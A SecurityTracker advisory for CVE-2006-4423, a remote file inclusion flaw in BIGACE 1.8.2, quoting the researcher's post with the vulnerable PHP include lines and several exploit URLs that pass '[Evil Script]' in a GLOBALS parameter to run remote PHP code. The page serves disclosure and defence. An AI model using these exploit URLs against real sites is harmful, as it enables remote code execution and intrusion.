SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   BIGACE Vendors:   bigace.sourceforge.net
BIGACE 'GLOBALS' Include File Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016760
SecurityTracker URL:  http://securitytracker.com/id/1016760
CVE Reference:   CVE-2006-4423   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 28 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.8.2, 1.9 alpha, possibly other versions
Description:   A vulnerability was reported in BIGACE. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The 'download.cmd.php', 'admin.cmd.php', and 'upload_form.php' scripts are affected.

http://[target]/[Bigace]/system/admin/include/item_main.php?GLOBALS=[Evil Script]

http://[target]/[Bigace]/system/admin/include/upload_form.php?GLOBALS=[Evil Script]

http://[target]/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]

http://[target]/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]

http://[target]/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil Script]

Vampire discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.

[Editor's note: It appears that at least one of the files (download.cmd.php) was changed in CVS to no longer contain the vulnerable include functions. This change was made after the 1.9 alpha release. Other files were not reviewed.]

Vendor URL:  bigace.kevinpapst.de/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Bigace 1.8.2 (GLOBALS) Remote File Inclusion

Author : Vampire	

Location : Iran - Tehran

HomePage : http://www.hackerz.ir

Email : Vampire_chiristof[at]yahoo[dot]com

Critical Level : Dangerous

------------------------------------------------------------------------
---------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Bigace

version : 1.8.2

URL : http://Bigace.sourceforge.net

------------------------------------------------------------------------
---------------

Vulnerability:

~~~~~~~~~~~~~

in download.cmd.php , admin.cmd.php , upload_form.php We Found Vulnerability Script

----------------------------------------admin.cmd.php-----------------------
---------------

....

<?php

            require_once($GLOBALS['_BIGACE']['DIR']['admin'].'styling.php');
            require_once($GLOBALS['_BIGACE']['DIR']['admin'].'functions.inc.php');
            include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');
            

?>

...
----------------------------------------download.cmd.php-----------------------
---------------
....

<?php

            include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');
            

?>

...


----------------------------------------upload_form.php-----------------------
---------------
....

<?php

           require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');
            

?>

...




----------------------------------------item_main.php-----------------------
---------------
....


<?php

          require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');



?>

...



Exploit:

~~~~~~~


http://www.target.com/[Bigace]/system/admin/include/item_main.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/admin/include/upload_form.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil Script]

Solution:

~~~~~~~~

Sanitize Variabel $GLOBALS in download.cmd.php , admin.cmd.php , item_main.php , upload_form.php

------------------------------------------------------------------------
----------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Cephexin , Sh3ll , MFOX , Alijbs and All Real Hackers

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC